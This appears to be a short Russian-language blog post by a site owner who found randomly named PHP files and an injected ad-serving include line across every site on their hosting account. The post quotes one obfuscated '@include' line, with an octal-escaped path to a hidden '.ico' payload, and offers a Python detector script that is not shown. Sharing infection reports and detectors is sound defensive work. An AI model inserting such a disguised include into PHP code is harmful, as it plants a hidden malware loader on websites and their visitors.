Не было печали. Зашел на хостинг посмотреть как там обстоят дела и обалдел
Во всех папках всех сайтов обнаружились левые файлы формата
fds0we.php
aoec03.php
wspw0.php
i3dksq.php
Давай я во все эти файлы поглядывать. Ну какие пустые, а какие и с данными примерно такими:
/*a8ec1*/ @include "\057home\057ebit\144a/pu\142lic_\150tml/\147eze.\143om.u\141/com\160onen\164s/co\155_sea\162ch/m\157dels\057.51f\14510ae\056ico"; /*a8ec1*/
И все php файлы в начале содержат include и короче, крутят рекламу…. В общем их так было много что все лопатить желание отпало наглухо.
Написал антивирус — детектор
Запустил и она показала в каких конкретно файлах есть эта дрянь.
Почистил руками за 10 минут. Вуаля…
Делюсь ..
Просто расфаршируйте архивируйте в зараженную папку и запустите через
python3 antivirus.py